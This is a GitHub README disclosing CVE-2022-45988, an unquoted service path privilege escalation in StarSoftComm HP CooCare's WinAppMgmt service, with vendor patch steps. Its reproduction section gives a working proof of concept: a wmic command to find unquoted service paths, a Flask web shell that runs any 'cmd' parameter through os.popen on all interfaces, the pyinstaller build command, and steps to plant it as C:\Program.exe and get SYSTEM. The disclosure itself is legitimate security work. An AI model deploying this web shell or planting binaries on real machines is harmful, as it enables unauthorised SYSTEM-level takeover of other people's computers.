Skip to content

happy0717/CVE-2022-45988

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 
 
 
 
 
 
 

CVE-2022-45988 StarSoftComm HP CooCare An elevation of privilege vulnerability exists

####################################################

I have contacted with hp-security-alert They have fixed this bug. About StarSoftComm CooCare [HP-PSRT-IR #4106] image The vendor responded with the following information:

Follow these steps to update:

  1. Launch eService
  2. Wait about 3 mins
  3. Close and launch eService again.
  4. Check version is v5.364 or later.

#####################################

An elevation of privilege vulnerability exists in StarSoftComm HP CooCare which could allow an attacker to elevate their privilege level e管家超级版是HP星14 pro 自带的一款远程诊断软件,该软件为StarSoftComm(软通科技)旗下产品

test on windows 11 22621.819 HP LAPTOP HP Pavilion Plus 14 英寸笔记本电脑 14-eh0000 (56D77AV)

Affected version: CooCare below v5.364

#Vulnerability reproduction

#The first step:wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """ find the service (使用上述CMD命令找到未引用的服务)

image

The service name is Windows Application Management Service = AKA = WinAppMgmt
服务的名称叫做Windows Application Management Service 简称是WinAppMgmt

image

The service is frome StarSoftComm CooCare

image

#Step 2:Prepare a malicious program

image

from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/')
def hello_world():
    r = request.args.getlist('cmd')  #Reception? cmd= parameter
    a=os.popen(r[0])  #Execute system commands
    l = a.read()
    return l  #return

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=14145, debug=True)  #Listen HTTP port 14145

I was useing python3 flask write a malicious exe .It can listenHTTP port 14145 and execute system commands.

Using commands pyinstaller.exe --onefile --windowed -F -w python_test.py make a malicious exe.

#Step 3:Put malware into path C:\ and rename malware to Program.exe

image

#Step 4:Start the Windows Application Management Service

If Windows Application Management Service is already start, you can restart it

image

#Step 5:Wait Windows Application Management Service start and execute the system commands C:\Program.exe run as system

When I see Windows Application Management Service start in Taskmgr.exe whit SYSTEM, Then I can Open browser input http://127.0.0.1:14145?cmd=whoami

Wait..........

for...

it.

NT SYSTEM

image

About

CVE-2022-45988 StarSoftComm HP CooCare An elevation of privilege vulnerability exists

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published